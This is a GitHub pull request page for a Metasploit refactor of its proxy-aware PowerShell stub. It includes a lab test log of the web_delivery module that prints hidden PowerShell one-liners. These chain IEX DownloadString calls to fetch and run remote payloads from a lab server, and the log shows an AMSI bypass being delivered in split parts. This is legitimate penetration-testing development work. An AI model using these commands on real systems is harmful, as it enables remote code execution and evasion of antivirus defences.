Closed cdelafuente-r7 closed 1 year ago
This change has fixed the issue previously being seen when testing https://github.com/rapid7/metasploit-framework/pull/17942. Thanks @cdelafuente-r7!
Testing check's out:
msf6 > use multi/script/web_delivery
[*] Using configured payload windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
[-] Unknown datastore option: cmd.
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 172.16.199.1
SRVHOST => 172.16.199.1
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 172.16.199.1 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/x64/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD calc.exe yes The command string to execute
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
Exploit target:
Id Name
-- ----
2 PSH
View the full module info with the info, or info -d command.
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://172.16.199.1:8080/PpsLxPdHAj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/s4y1988'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/l8mjG5uXTteHBoh'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/5vQTHmZDvYctdwk/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj'));
msf6 exploit(multi/script/web_delivery) > [*] 172.16.199.138 web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138 web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 1/1(1601 bytes)
[*] 172.16.199.138 web_delivery - Powershell command length: 2101
[*] 172.16.199.138 web_delivery - Delivering Payload (2101 bytes)
msf6 exploit(multi/script/web_delivery) > set PSH-AmsiBypassSplit 5
PSH-AmsiBypassSplit => 5
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Using URL: https://172.16.199.1:8080/8PdWHFVF7ZLso
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > [*] Splitting bypass protection script in 5 parts
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/JAGui4aIHA'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/XsPNfTP'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/2'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/3'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/4'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/5'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso'));
[*] 172.16.199.138 web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138 web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 1/5(751 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 2/5(392 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 3/5(81 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 4/5(30 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 5/5(351 bytes)
[*] 172.16.199.138 web_delivery - Powershell command length: 2069
[*] 172.16.199.138 web_delivery - Delivering Payload (2069 bytes)
This PR is a simple update to the method responsible of generating the Powershell stub that uses the default system web proxy and credentials. The logic has been extracted and moved to a new method
self.proxy_aware
. The original methodself.proxy_aware_download_and_exec_string
now calls it before concatenating the "download and exec" logic.These changes are needed by this Metasploit's PR.
Testing
The easiest way to test this is to follow the steps listed in this PR.